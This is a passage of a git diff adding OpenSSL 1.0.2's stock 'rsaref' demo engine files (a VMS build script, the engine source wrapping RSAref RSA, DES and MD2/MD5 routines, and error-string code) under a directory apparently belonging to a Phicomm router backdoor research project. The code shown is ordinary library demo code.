+$	set default [-]
+$	define/user openssl [---.include.openssl]
+$	cc/define=ENGINE_DYNAMIC_SUPPORT rsaref.c
+$
+$	if arch .eqs. "VAX"
+$	then
+$	    macro/object=rsaref_vec.obj sys$input:
+;
+; Transfer vector for VAX shareable image
+;
+	.TITLE librsaref
+;
+; Define macro to assist in building transfer vector entries.  Each entry
+; should take no more than 8 bytes.
+;
+	.MACRO FTRANSFER_ENTRY routine
+	.ALIGN QUAD
+	.TRANSFER routine
+	.MASK	routine
+	JMP	routine+2
+	.ENDM FTRANSFER_ENTRY
+;
+; Place entries in own program section.
+;
+	.PSECT $$LIBRSAREF,QUAD,PIC,USR,CON,REL,LCL,SHR,EXE,RD,NOWRT
+
+LIBRSAREF_xfer:
+	FTRANSFER_ENTRY bind_engine
+	FTRANSFER_ENTRY v_check
+
+;
+; Allocate extra storage at end of vector to allow for expansion.
+;
+	.BLKB 512-<.-LIBRSAREF_xfer>	; 1 page.
+	.END
+$	    link/share=librsaref.exe sys$input:/option
+!
+! Ensure transfer vector is at beginning of image
+!
+CLUSTER=FIRST
+COLLECT=FIRST,$$LIBRSAREF
+!
+! make psects nonshareable so image can be installed.
+!
+PSECT_ATTR=$CHAR_STRING_CONSTANTS,NOWRT
+[]rsaref_vec.obj
+[]rsaref.obj
+[.install]rsaref.olb/lib
+[---.vax.exe.crypto]libcrypto.olb/lib
+$	else
+$	    if arch_name .eqs. "ALPHA"
+$	    then
+$		link/share=librsaref.exe sys$input:/option
+[]rsaref.obj
+[.install]rsaref.olb/lib
+[---.alpha.exe.crypto]libcrypto.olb/lib
+symbol_vector=(bind_engine=procedure,v_check=procedure)
+$	    else
+$		if arch_name .eqs. "IA64"
+$		then
+$		    link /shareable=librsaref.exe sys$input: /options
+[]rsaref.obj
+[.install]rsaref.olb/lib
+[---.ia64.exe.crypto]libcrypto.olb/lib
+symbol_vector=(bind_engine=procedure,v_check=procedure)
+$		endif
+$	    endif
+$	endif
+$
+$	set default '_save_default'
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/rsaref/rsaref.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/rsaref/rsaref.c
new file mode 100644
index 0000000..498cc70
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/rsaref/rsaref.c
@@ -0,0 +1,713 @@
+/*
+ * Demo of how to construct your own engine and using it.  The basis of this
+ * engine is RSAref, an old reference of the RSA algorithm which can still be
+ * found a little here and there.
+ */
+
+#include <stdio.h>
+#include <string.h>
+#include "./source/global.h"
+#include "./source/rsaref.h"
+#include "./source/rsa.h"
+#include "./source/des.h"
+#include <openssl/err.h>
+#define OPENSSL_NO_MD2
+#define OPENSSL_NO_MD5
+#include <openssl/evp.h>
+#include <openssl/bn.h>
+#include <openssl/engine.h>
+
+#define RSAREF_LIB_NAME "rsaref engine"
+#include "rsaref_err.c"
+
+/*****************************************************************************
+ *** Function declarations and global variable definitions                 ***
+ *****************************************************************************/
+
+/*****************************************************************************
+ * Constants used when creating the ENGINE
+ **/
+static const char *engine_rsaref_id = "rsaref";
+static const char *engine_rsaref_name = "RSAref engine support";
+
+/*****************************************************************************
+ * Functions to handle the engine
+ **/
+static int rsaref_destroy(ENGINE *e);
+static int rsaref_init(ENGINE *e);
+static int rsaref_finish(ENGINE *e);
+#if 0
+static int rsaref_ctrl(ENGINE *e, int cmd, long i, void *p, void (*f) ());
+#endif
+
+/*****************************************************************************
+ * Engine commands
+ **/
+static const ENGINE_CMD_DEFN rsaref_cmd_defns[] = {
+    {0, NULL, NULL, 0}
+};
+
+/*****************************************************************************
+ * RSA functions
+ **/
+static int rsaref_private_decrypt(int len, const unsigned char *from,
+                                  unsigned char *to, RSA *rsa, int padding);
+static int rsaref_private_encrypt(int len, const unsigned char *from,
+                                  unsigned char *to, RSA *rsa, int padding);
+static int rsaref_public_encrypt(int len, const unsigned char *from,
+                                 unsigned char *to, RSA *rsa, int padding);
+static int rsaref_public_decrypt(int len, const unsigned char *from,
+                                 unsigned char *to, RSA *rsa, int padding);
+static int bnref_mod_exp(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
+                         const BIGNUM *m, BN_CTX *ctx, BN_MONT_CTX *m_ctx);
+static int rsaref_mod_exp(BIGNUM *r0, const BIGNUM *I, RSA *rsa);
+
+/*****************************************************************************
+ * Our RSA method
+ **/
+static RSA_METHOD rsaref_rsa = {
+    "RSAref PKCS#1 RSA",
+    rsaref_public_encrypt,
+    rsaref_public_decrypt,
+    rsaref_private_encrypt,
+    rsaref_private_decrypt,
+    rsaref_mod_exp,
+    bnref_mod_exp,
+    NULL,
+    NULL,
+    0,
+    NULL,
+    NULL,
+    NULL
+};
+
+/*****************************************************************************
+ * Symetric cipher and digest function registrars
+ **/
+static int rsaref_ciphers(ENGINE *e, const EVP_CIPHER **cipher,
+                          const int **nids, int nid);
+static int rsaref_digests(ENGINE *e, const EVP_MD **digest,
+                          const int **nids, int nid);
+
+static int rsaref_cipher_nids[] =
+    { NID_des_cbc, NID_des_ede3_cbc, NID_desx_cbc, 0 };
+static int rsaref_digest_nids[] = { NID_md2, NID_md5, 0 };
+
+/*****************************************************************************
+ * DES functions
+ **/
+static int cipher_des_cbc_init(EVP_CIPHER_CTX *ctx, const unsigned char *key,
+                               const unsigned char *iv, int enc);
+static int cipher_des_cbc_code(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                               const unsigned char *in, unsigned int inl);
+static int cipher_des_cbc_clean(EVP_CIPHER_CTX *);
+static int cipher_des_ede3_cbc_init(EVP_CIPHER_CTX *ctx,
+                                    const unsigned char *key,
+                                    const unsigned char *iv, int enc);
+static int cipher_des_ede3_cbc_code(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                                    const unsigned char *in,
+                                    unsigned int inl);
+static int cipher_des_ede3_cbc_clean(EVP_CIPHER_CTX *);
+static int cipher_desx_cbc_init(EVP_CIPHER_CTX *ctx, const unsigned char *key,
+                                const unsigned char *iv, int enc);
+static int cipher_desx_cbc_code(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                                const unsigned char *in, unsigned int inl);
+static int cipher_desx_cbc_clean(EVP_CIPHER_CTX *);
+
+/*****************************************************************************
+ * Our DES ciphers
+ **/
+static const EVP_CIPHER cipher_des_cbc = {
+    NID_des_cbc,
+    8, 8, 8,
+    0 | EVP_CIPH_CBC_MODE,
+    cipher_des_cbc_init,
+    cipher_des_cbc_code,
+    cipher_des_cbc_clean,
+    sizeof(DES_CBC_CTX),
+    NULL,
+    NULL,
+    NULL,
+    NULL
+};
+
+static const EVP_CIPHER cipher_des_ede3_cbc = {
+    NID_des_ede3_cbc,
+    8, 24, 8,
+    0 | EVP_CIPH_CBC_MODE,
+    cipher_des_ede3_cbc_init,
+    cipher_des_ede3_cbc_code,
+    cipher_des_ede3_cbc_clean,
+    sizeof(DES3_CBC_CTX),
+    NULL,
+    NULL,
+    NULL,
+    NULL
+};
+
+static const EVP_CIPHER cipher_desx_cbc = {
+    NID_desx_cbc,
+    8, 24, 8,
+    0 | EVP_CIPH_CBC_MODE,
+    cipher_desx_cbc_init,
+    cipher_desx_cbc_code,
+    cipher_desx_cbc_clean,
+    sizeof(DESX_CBC_CTX),
+    NULL,
+    NULL,
+    NULL,
+    NULL
+};
+
+/*****************************************************************************
+ * MD functions
+ **/
+static int digest_md2_init(EVP_MD_CTX *ctx);
+static int digest_md2_update(EVP_MD_CTX *ctx, const void *data,
+                             unsigned long count);
+static int digest_md2_final(EVP_MD_CTX *ctx, unsigned char *md);
+static int digest_md5_init(EVP_MD_CTX *ctx);
+static int digest_md5_update(EVP_MD_CTX *ctx, const void *data,
+                             unsigned long count);
+static int digest_md5_final(EVP_MD_CTX *ctx, unsigned char *md);
+
+/*****************************************************************************
+ * Our MD digests
+ **/
+static const EVP_MD digest_md2 = {
+    NID_md2,
+    NID_md2WithRSAEncryption,
+    16,
+    0,
+    digest_md2_init,
+    digest_md2_update,
+    digest_md2_final,
+    NULL,
+    NULL,
+    EVP_PKEY_RSA_method,
+    16,
+    sizeof(MD2_CTX)
+};
+
+static const EVP_MD digest_md5 = {
+    NID_md5,
+    NID_md5WithRSAEncryption,
+    16,
+    0,
+    digest_md5_init,
+    digest_md5_update,
+    digest_md5_final,
+    NULL,
+    NULL,
+    EVP_PKEY_RSA_method,
+    64,
+    sizeof(MD5_CTX)
+};
+
+/*****************************************************************************
+ *** Function definitions                                                  ***
+ *****************************************************************************/
+
+/*****************************************************************************
+ * Functions to handle the engine
+ **/
+
+static int bind_rsaref(ENGINE *e)
+{
+    const RSA_METHOD *meth1;
+    if (!ENGINE_set_id(e, engine_rsaref_id)
+        || !ENGINE_set_name(e, engine_rsaref_name)
+        || !ENGINE_set_RSA(e, &rsaref_rsa)
+        || !ENGINE_set_ciphers(e, rsaref_ciphers)
+        || !ENGINE_set_digests(e, rsaref_digests)
+        || !ENGINE_set_destroy_function(e, rsaref_destroy)
+        || !ENGINE_set_init_function(e, rsaref_init)
+        || !ENGINE_set_finish_function(e, rsaref_finish)
+        /* || !ENGINE_set_ctrl_function(e, rsaref_ctrl) */
+        /*
+         * || !ENGINE_set_cmd_defns(e, rsaref_cmd_defns)
+         */ )
+        return 0;
+
+    /* Ensure the rsaref error handling is set up */
+    ERR_load_RSAREF_strings();
+    return 1;
+}
+
+#ifdef ENGINE_DYNAMIC_SUPPORT
+static int bind_helper(ENGINE *e, const char *id)
+{
+    if (id && (strcmp(id, engine_rsaref_id) != 0))
+        return 0;
+    if (!bind_rsaref(e))
+        return 0;
+    return 1;
+}
+
+IMPLEMENT_DYNAMIC_CHECK_FN()
+    IMPLEMENT_DYNAMIC_BIND_FN(bind_helper)
+#else
+static ENGINE *engine_rsaref(void)
+{
+    ENGINE *ret = ENGINE_new();
+    if (!ret)
+        return NULL;
+    if (!bind_rsaref(ret)) {
+        ENGINE_free(ret);
+        return NULL;
+    }
+    return ret;
+}
+
+void ENGINE_load_rsaref(void)
+{
+    /* Copied from eng_[openssl|dyn].c */
+    ENGINE *toadd = engine_rsaref();
+    if (!toadd)
+        return;
+    ENGINE_add(toadd);
+    ENGINE_free(toadd);
+    ERR_clear_error();
+}
+#endif
+
+/* Initiator which is only present to make sure this engine looks available */
+static int rsaref_init(ENGINE *e)
+{
+    return 1;
+}
+
+/* Finisher which is only present to make sure this engine looks available */
+static int rsaref_finish(ENGINE *e)
+{
+    return 1;
+}
+
+/* Destructor (complements the "ENGINE_ncipher()" constructor) */
+static int rsaref_destroy(ENGINE *e)
+{
+    ERR_unload_RSAREF_strings();
+    return 1;
+}
+
+/*****************************************************************************
+ * RSA functions
+ **/
+
+static int rsaref_mod_exp(BIGNUM *r0, const BIGNUM *I, RSA *rsa)
+{
+    RSAREFerr(RSAREF_F_RSAREF_MOD_EXP, ERR_R_SHOULD_NOT_HAVE_BEEN_CALLED);
+    return (0);
+}
+
+static int bnref_mod_exp(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
+                         const BIGNUM *m, BN_CTX *ctx, BN_MONT_CTX *m_ctx)
+{
+    RSAREFerr(RSAREF_F_BNREF_MOD_EXP, ERR_R_SHOULD_NOT_HAVE_BEEN_CALLED);
+    return (0);
+}
+
+/* unsigned char *to:  [max]    */
+static int RSAref_bn2bin(BIGNUM *from, unsigned char *to, int max)
+{
+    int i;
+
+    i = BN_num_bytes(from);
+    if (i > max) {
+        RSAREFerr(RSAREF_F_RSAREF_BN2BIN, RSAREF_R_LEN);
+        return (0);
+    }
+
+    memset(to, 0, (unsigned int)max);
+    if (!BN_bn2bin(from, &(to[max - i])))
+        return (0);
+    return (1);
+}
+
+#ifdef undef
+/* unsigned char *from:  [max]    */
+static BIGNUM *RSAref_bin2bn(unsigned char *from, BIGNUM *to, int max)
+{
+    int i;
+    BIGNUM *ret;
+
+    for (i = 0; i < max; i++)
+        if (from[i])
+            break;
+
+    ret = BN_bin2bn(&(from[i]), max - i, to);
+    return (ret);
+}
+
+static int RSAref_Public_ref2eay(RSArefPublicKey * from, RSA *to)
+{
+    to->n = RSAref_bin2bn(from->m, NULL, RSAref_MAX_LEN);
+    to->e = RSAref_bin2bn(from->e, NULL, RSAref_MAX_LEN);
+    if ((to->n == NULL) || (to->e == NULL))
+        return (0);
+    return (1);
+}
+#endif
+
+static int RSAref_Public_eay2ref(RSA *from, R_RSA_PUBLIC_KEY * to)
+{
+    to->bits = BN_num_bits(from->n);
+    if (!RSAref_bn2bin(from->n, to->modulus, MAX_RSA_MODULUS_LEN))
+        return (0);
+    if (!RSAref_bn2bin(from->e, to->exponent, MAX_RSA_MODULUS_LEN))
+        return (0);
+    return (1);
+}
+
+#ifdef undef
+static int RSAref_Private_ref2eay(RSArefPrivateKey * from, RSA *to)
+{
+    if ((to->n = RSAref_bin2bn(from->m, NULL, RSAref_MAX_LEN)) == NULL)
+        return (0);
+    if ((to->e = RSAref_bin2bn(from->e, NULL, RSAref_MAX_LEN)) == NULL)
+        return (0);
+    if ((to->d = RSAref_bin2bn(from->d, NULL, RSAref_MAX_LEN)) == NULL)
+        return (0);
+    if ((to->p =
+         RSAref_bin2bn(from->prime[0], NULL, RSAref_MAX_PLEN)) == NULL)
+        return (0);
+    if ((to->q =
+         RSAref_bin2bn(from->prime[1], NULL, RSAref_MAX_PLEN)) == NULL)
+        return (0);
+    if ((to->dmp1 = RSAref_bin2bn(from->pexp[0], NULL, RSAref_MAX_PLEN))
+        == NULL)
+        return (0);
+    if ((to->dmq1 = RSAref_bin2bn(from->pexp[1], NULL, RSAref_MAX_PLEN))
+        == NULL)
+        return (0);
+    if ((to->iqmp = RSAref_bin2bn(from->coef, NULL, RSAref_MAX_PLEN)) == NULL)
+        return (0);
+    return (1);
+}
+#endif
+
+static int RSAref_Private_eay2ref(RSA *from, R_RSA_PRIVATE_KEY * to)
+{
+    to->bits = BN_num_bits(from->n);
+    if (!RSAref_bn2bin(from->n, to->modulus, MAX_RSA_MODULUS_LEN))
+        return (0);
+    if (!RSAref_bn2bin(from->e, to->publicExponent, MAX_RSA_MODULUS_LEN))
+        return (0);
+    if (!RSAref_bn2bin(from->d, to->exponent, MAX_RSA_MODULUS_LEN))
+        return (0);
+    if (!RSAref_bn2bin(from->p, to->prime[0], MAX_RSA_PRIME_LEN))
+        return (0);
+    if (!RSAref_bn2bin(from->q, to->prime[1], MAX_RSA_PRIME_LEN))
+        return (0);
+    if (!RSAref_bn2bin(from->dmp1, to->primeExponent[0], MAX_RSA_PRIME_LEN))
+        return (0);
+    if (!RSAref_bn2bin(from->dmq1, to->primeExponent[1], MAX_RSA_PRIME_LEN))
+        return (0);
+    if (!RSAref_bn2bin(from->iqmp, to->coefficient, MAX_RSA_PRIME_LEN))
+        return (0);
+    return (1);
+}
+
+static int rsaref_private_decrypt(int len, const unsigned char *from,
+                                  unsigned char *to, RSA *rsa, int padding)
+{
+    int i, outlen = -1;
+    R_RSA_PRIVATE_KEY RSAkey;
+
+    if (!RSAref_Private_eay2ref(rsa, &RSAkey))
+        goto err;
+    if ((i =
+         RSAPrivateDecrypt(to, (unsigned int *)&outlen, (unsigned char *)from,
+                           len, &RSAkey)) != 0) {
+        RSAREFerr(RSAREF_F_RSAREF_PRIVATE_DECRYPT, i);
+        outlen = -1;
+    }
+ err:
+    memset(&RSAkey, 0, sizeof(RSAkey));
+    return (outlen);
+}
+
+static int rsaref_private_encrypt(int len, const unsigned char *from,
+                                  unsigned char *to, RSA *rsa, int padding)
+{
+    int i, outlen = -1;
+    R_RSA_PRIVATE_KEY RSAkey;
+
+    if (padding != RSA_PKCS1_PADDING) {
+        RSAREFerr(RSAREF_F_RSAREF_PRIVATE_ENCRYPT,
+                  RSA_R_UNKNOWN_PADDING_TYPE);
+        goto err;
+    }
+    if (!RSAref_Private_eay2ref(rsa, &RSAkey))
+        goto err;
+    if ((i =
+         RSAPrivateEncrypt(to, (unsigned int *)&outlen, (unsigned char *)from,
+                           len, &RSAkey)) != 0) {
+        RSAREFerr(RSAREF_F_RSAREF_PRIVATE_ENCRYPT, i);
+        outlen = -1;
+    }
+ err:
+    memset(&RSAkey, 0, sizeof(RSAkey));
+    return (outlen);
+}
+
+static int rsaref_public_decrypt(int len, const unsigned char *from,
+                                 unsigned char *to, RSA *rsa, int padding)
+{
+    int i, outlen = -1;
+    R_RSA_PUBLIC_KEY RSAkey;
+
+    if (!RSAref_Public_eay2ref(rsa, &RSAkey))
+        goto err;
+    if ((i =
+         RSAPublicDecrypt(to, (unsigned int *)&outlen, (unsigned char *)from,
+                          len, &RSAkey)) != 0) {
+        RSAREFerr(RSAREF_F_RSAREF_PUBLIC_DECRYPT, i);
+        outlen = -1;
+    }
+ err:
+    memset(&RSAkey, 0, sizeof(RSAkey));
+    return (outlen);
+}
+
+static int rsaref_public_encrypt(int len, const unsigned char *from,
+                                 unsigned char *to, RSA *rsa, int padding)
+{
+    int outlen = -1;
+    int i;
+    R_RSA_PUBLIC_KEY RSAkey;
+    R_RANDOM_STRUCT rnd;
+    unsigned char buf[16];
+
+    if (padding != RSA_PKCS1_PADDING && padding != RSA_SSLV23_PADDING) {
+        RSAREFerr(RSAREF_F_RSAREF_PUBLIC_ENCRYPT, RSA_R_UNKNOWN_PADDING_TYPE);
+        goto err;
+    }
+
+    R_RandomInit(&rnd);
+    R_GetRandomBytesNeeded((unsigned int *)&i, &rnd);
+    while (i > 0) {
+        if (RAND_bytes(buf, 16) <= 0)
+            goto err;
+        R_RandomUpdate(&rnd, buf, (unsigned int)((i > 16) ? 16 : i));
+        i -= 16;
+    }
+
+    if (!RSAref_Public_eay2ref(rsa, &RSAkey))
+        goto err;
+    if ((i =
+         RSAPublicEncrypt(to, (unsigned int *)&outlen, (unsigned char *)from,
+                          len, &RSAkey, &rnd)) != 0) {
+        RSAREFerr(RSAREF_F_RSAREF_PUBLIC_ENCRYPT, i);
+        outlen = -1;
+        goto err;
+    }
+ err:
+    memset(&RSAkey, 0, sizeof(RSAkey));
+    R_RandomFinal(&rnd);
+    memset(&rnd, 0, sizeof(rnd));
+    return (outlen);
+}
+
+/*****************************************************************************
+ * Symetric cipher and digest function registrars
+ **/
+static int rsaref_ciphers(ENGINE *e, const EVP_CIPHER **cipher,
+                          const int **nids, int nid)
+{
+    int ok = 1;
+    if (!cipher) {
+        /* We are returning a list of supported nids */
+        *nids = rsaref_cipher_nids;
+        return (sizeof(rsaref_cipher_nids) -
+                1) / sizeof(rsaref_cipher_nids[0]);
+    }
+    /* We are being asked for a specific cipher */
+    switch (nid) {
+    case NID_des_cbc:
+        *cipher = &cipher_des_cbc;
+        break;
+    case NID_des_ede3_cbc:
+        *cipher = &cipher_des_ede3_cbc;
+        break;
+    case NID_desx_cbc:
+        *cipher = &cipher_desx_cbc;
+        break;
+    default:
+        ok = 0;
+        *cipher = NULL;
+        break;
+    }
+    return ok;
+}
+
+static int rsaref_digests(ENGINE *e, const EVP_MD **digest,
+                          const int **nids, int nid)
+{
+    int ok = 1;
+    if (!digest) {
+        /* We are returning a list of supported nids */
+        *nids = rsaref_digest_nids;
+        return (sizeof(rsaref_digest_nids) -
+                1) / sizeof(rsaref_digest_nids[0]);
+    }
+    /* We are being asked for a specific digest */
+    switch (nid) {
+    case NID_md2:
+        *digest = &digest_md2;
+        break;
+    case NID_md5:
+        *digest = &digest_md5;
+        break;
+    default:
+        ok = 0;
+        *digest = NULL;
+        break;
+    }
+    return ok;
+}
+
+/*****************************************************************************
+ * DES functions
+ **/
+#undef data
+#define data(ctx) ((DES_CBC_CTX *)(ctx)->cipher_data)
+static int cipher_des_cbc_init(EVP_CIPHER_CTX *ctx, const unsigned char *key,
+                               const unsigned char *iv, int enc)
+{
+    DES_CBCInit(data(ctx), (unsigned char *)key, (unsigned char *)iv, enc);
+    return 1;
+}
+
+static int cipher_des_cbc_code(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                               const unsigned char *in, unsigned int inl)
+{
+    int ret = DES_CBCUpdate(data(ctx), out, (unsigned char *)in, inl);
+    switch (ret) {
+    case RE_LEN:
+        RSAREFerr(RSAREF_F_CIPHER_DES_CBC_CODE,
+                  RSAREF_R_LENGTH_NOT_BLOCK_ALIGNED);
+        break;
+    case 0:
+        break;
+    default:
+        RSAREFerr(RSAREF_F_CIPHER_DES_CBC_CODE, RSAREF_R_UNKNOWN_FAULT);
+    }
+    return !ret;
+}
+
+static int cipher_des_cbc_clean(EVP_CIPHER_CTX *ctx)
+{
+    memset(data(ctx), 0, ctx->cipher->ctx_size);
+    return 1;
+}
+
+#undef data
+#define data(ctx) ((DES3_CBC_CTX *)(ctx)->cipher_data)
+static int cipher_des_ede3_cbc_init(EVP_CIPHER_CTX *ctx,
+                                    const unsigned char *key,
+                                    const unsigned char *iv, int enc)
+{
+    DES3_CBCInit(data(ctx), (unsigned char *)key, (unsigned char *)iv, enc);
+    return 1;
+}
+
+static int cipher_des_ede3_cbc_code(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                                    const unsigned char *in, unsigned int inl)
+{
+    int ret = DES3_CBCUpdate(data(ctx), out, (unsigned char *)in, inl);
+    switch (ret) {
+    case RE_LEN:
+        RSAREFerr(RSAREF_F_CIPHER_DES_CBC_CODE,
+                  RSAREF_R_LENGTH_NOT_BLOCK_ALIGNED);
+        break;
+    case 0:
+        break;
+    default:
+        RSAREFerr(RSAREF_F_CIPHER_DES_CBC_CODE, RSAREF_R_UNKNOWN_FAULT);
+    }
+    return !ret;
+}
+
+static int cipher_des_ede3_cbc_clean(EVP_CIPHER_CTX *ctx)
+{
+    memset(data(ctx), 0, ctx->cipher->ctx_size);
+    return 1;
+}
+
+#undef data
+#define data(ctx) ((DESX_CBC_CTX *)(ctx)->cipher_data)
+static int cipher_desx_cbc_init(EVP_CIPHER_CTX *ctx, const unsigned char *key,
+                                const unsigned char *iv, int enc)
+{
+    DESX_CBCInit(data(ctx), (unsigned char *)key, (unsigned char *)iv, enc);
+    return 1;
+}
+
+static int cipher_desx_cbc_code(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                                const unsigned char *in, unsigned int inl)
+{
+    int ret = DESX_CBCUpdate(data(ctx), out, (unsigned char *)in, inl);
+    switch (ret) {
+    case RE_LEN:
+        RSAREFerr(RSAREF_F_CIPHER_DES_CBC_CODE,
+                  RSAREF_R_LENGTH_NOT_BLOCK_ALIGNED);
+        break;
+    case 0:
+        break;
+    default:
+        RSAREFerr(RSAREF_F_CIPHER_DES_CBC_CODE, RSAREF_R_UNKNOWN_FAULT);
+    }
+    return !ret;
+}
+
+static int cipher_desx_cbc_clean(EVP_CIPHER_CTX *ctx)
+{
+    memset(data(ctx), 0, ctx->cipher->ctx_size);
+    return 1;
+}
+
+/*****************************************************************************
+ * MD functions
+ **/
+#undef data
+#define data(ctx) ((MD2_CTX *)(ctx)->md_data)
+static int digest_md2_init(EVP_MD_CTX *ctx)
+{
+    MD2Init(data(ctx));
+    return 1;
+}
+
+static int digest_md2_update(EVP_MD_CTX *ctx, const void *data,
+                             unsigned long count)
+{
+    MD2Update(data(ctx), (unsigned char *)data, (unsigned int)count);
+    return 1;
+}
+
+static int digest_md2_final(EVP_MD_CTX *ctx, unsigned char *md)
+{
+    MD2Final(md, data(ctx));
+    return 1;
+}
+
+#undef data
+#define data(ctx) ((MD5_CTX *)(ctx)->md_data)
+static int digest_md5_init(EVP_MD_CTX *ctx)
+{
+    MD5Init(data(ctx));
+    return 1;
+}
+
+static int digest_md5_update(EVP_MD_CTX *ctx, const void *data,
+                             unsigned long count)
+{
+    MD5Update(data(ctx), (unsigned char *)data, (unsigned int)count);
+    return 1;
+}
+
+static int digest_md5_final(EVP_MD_CTX *ctx, unsigned char *md)
+{
+    MD5Final(md, data(ctx));
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/rsaref/rsaref.ec b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/rsaref/rsaref.ec
new file mode 100644
index 0000000..c690ae3
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/rsaref/rsaref.ec
@@ -0,0 +1,8 @@
+# configuration file for util/mkerr.pl
+#
+# use like this:
+#
+#	perl ../../../util/mkerr.pl -conf rsaref.ec \
+#		-nostatic -staticloader -write *.c
+
+L RSAREF	rsaref_err.h			rsaref_err.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/rsaref/rsaref_err.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/rsaref/rsaref_err.c
new file mode 100644
index 0000000..55df08c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/rsaref/rsaref_err.c
@@ -0,0 +1,158 @@
+/* rsaref_err.c */
+/* ====================================================================
+ * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/*
+ * NOTE: this file was auto generated by the mkerr.pl script: any changes
+ * made to it will be overwritten when the script next updates this file,
+ * only reason strings will be preserved.
+ */
+
+#include <stdio.h>
+#include <openssl/err.h>
+#include "rsaref_err.h"
+
+/* BEGIN ERROR CODES */
+#ifndef OPENSSL_NO_ERR
+static ERR_STRING_DATA RSAREF_str_functs[] = {
+    {ERR_PACK(0, RSAREF_F_BNREF_MOD_EXP, 0), "BNREF_MOD_EXP"},
+    {ERR_PACK(0, RSAREF_F_CIPHER_DES_CBC_CODE, 0), "CIPHER_DES_CBC_CODE"},
+    {ERR_PACK(0, RSAREF_F_RSAREF_BN2BIN, 0), "RSAREF_BN2BIN"},
+    {ERR_PACK(0, RSAREF_F_RSAREF_MOD_EXP, 0), "RSAREF_MOD_EXP"},
+    {ERR_PACK(0, RSAREF_F_RSAREF_PRIVATE_DECRYPT, 0),
+     "RSAREF_PRIVATE_DECRYPT"},
+    {ERR_PACK(0, RSAREF_F_RSAREF_PRIVATE_ENCRYPT, 0),
+     "RSAREF_PRIVATE_ENCRYPT"},
+    {ERR_PACK(0, RSAREF_F_RSAREF_PUBLIC_DECRYPT, 0), "RSAREF_PUBLIC_DECRYPT"},
+    {ERR_PACK(0, RSAREF_F_RSAREF_PUBLIC_ENCRYPT, 0), "RSAREF_PUBLIC_ENCRYPT"},
+    {ERR_PACK(0, RSAREF_F_RSA_BN2BIN, 0), "RSA_BN2BIN"},
+    {ERR_PACK(0, RSAREF_F_RSA_PRIVATE_DECRYPT, 0), "RSA_PRIVATE_DECRYPT"},
+    {ERR_PACK(0, RSAREF_F_RSA_PRIVATE_ENCRYPT, 0), "RSA_PRIVATE_ENCRYPT"},
+    {ERR_PACK(0, RSAREF_F_RSA_PUBLIC_DECRYPT, 0), "RSA_PUBLIC_DECRYPT"},
+    {ERR_PACK(0, RSAREF_F_RSA_PUBLIC_ENCRYPT, 0), "RSA_PUBLIC_ENCRYPT"},
+    {0, NULL}
+};
+
+static ERR_STRING_DATA RSAREF_str_reasons[] = {
+    {RSAREF_R_CONTENT_ENCODING, "content encoding"},
+    {RSAREF_R_DATA, "data"},
+    {RSAREF_R_DIGEST_ALGORITHM, "digest algorithm"},
+    {RSAREF_R_ENCODING, "encoding"},
+    {RSAREF_R_ENCRYPTION_ALGORITHM, "encryption algorithm"},
